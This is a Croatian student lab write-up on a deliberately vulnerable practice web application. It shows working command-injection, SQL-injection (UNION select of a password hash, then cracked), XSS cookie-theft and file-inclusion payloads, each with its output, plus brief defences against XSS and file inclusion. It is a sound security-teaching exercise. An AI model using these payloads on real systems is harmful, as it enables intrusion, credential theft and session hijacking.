1. Ispisivanje /etc/passwd
Možemo upisati sljedeće: 1 | cat /etc/passwd
Rezultat:
=====================================================================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false
=====================================================================================================

2. SQL injection
Upisana naredba: 1' or '1'='1 
Rezultat:
=====================================================================================================
ID: 1' or '1'='1
First name: admin
Surname: admin

ID: 1' or '1'='1
First name: Gordon
Surname: Brown

ID: 1' or '1'='1
First name: Hack
Surname: Me

ID: 1' or '1'='1
First name: Pablo
Surname: Picasso

ID: 1' or '1'='1
First name: Bob
Surname: Smith
=====================================================================================================
Dohvaćivanje lozinke za: Pablo Picasso
Naredba: 1' or 1=1 union select null,password from users where first_name='Pablo
Jedan dio ispisa:
=====================================================================================================
ID: 1' or 1=1 union select null,password from users where first_name='Pablo
First name: 
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
=====================================================================================================
Pass:0d107d09f5bbe40cade3de5c71e9e9b7
Koristeći crackstation otkrijemo da je password: letmein
Nisam koristio '#' na kraju naredbi, ali je ispalo nepotrebno



3.XSS
Za probu sam upisao: <script>alert('xss');</script>
Rezultat: stranica je izbacila alert.
Za dohvaćanje kolačića možemo koristiti: 
<script>alert(document.cookie);</script>

PHPSESSID=tbcjq02etar3ale8cov3rgle12
http://mrepro.tel.fer.hr/srs?cookie=security=low;%20PHPSESSID=tbcjq02etar3ale8cov3rgle12&jmbag=0036539611

Kako se sve možemo zaštititi od XSS napada?
Za početak, možemo sanitizirati input (npr. <script> nije dozvoljen input). Whitelist
POST radije nego GET
HTTPOnly Cookie
Ne uključivati ono što korisnik unese u izlaz aplikacije.



4.File inclusion
U URL 
Za page parametar upišemo: /etc/passwd (također smijemo dodavati ../ prije path-a koliko god puta želimo, ali je ovdje bilo nepotrebno)
Rezultat:
=====================================================================================================
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/bin/false mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false 
=====================================================================================================
(ovo se ispisalo na vrhu stranice)

Kako sve možemo riješiti problem inkluzije datoteka?
Treba provjeriti dozvole korisnika (autentifikacija)
Možemo vrijednosti u URL-u zamijeniti s privremenim koje se na poslužitelju preslikaju u prave
Whitelist: samo određene datoteke smiju biti otvorene od strane neke php skripte